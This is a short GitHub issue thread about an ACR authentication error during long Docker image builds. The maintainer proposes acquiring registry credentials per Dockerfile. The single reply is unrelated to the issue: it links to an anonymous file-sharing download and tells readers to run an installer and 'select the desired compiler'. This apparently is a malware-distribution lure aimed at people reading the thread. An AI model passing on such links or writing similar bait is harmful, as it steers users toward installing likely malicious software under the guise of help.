### ISSUE TITLE
Auth error when pulling cached image

### ISSUE THREAD

**Issue by mthalman** [dotnet/docker-tools#1424]
There's a [build in buildtools-prereqs](https://dev.azure.com/dnceng/internal/_build/results?buildId=2530258&view=logs&j=9aada89a-2e24-5acb-2807-6900158b9cce&t=6f3c41b4-0b5c-55eb-81af-364314aaa449) (internal link) that is failing with an unauthorized error when attempting to pull an image from the ACR. This scenario occurs when the build ends up building an image that takes a long time (in this case 3+ hrs) and then attempting to pull an image from the ACR due to a cache hit.

We probably need to change the logic so that it calls `IRegistryCredentialsProvider.ExecuteWithCredentialsAsync` for each Dockerfile that is processed rather than once for the whole batch.

**Comment by ArsatiR** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer
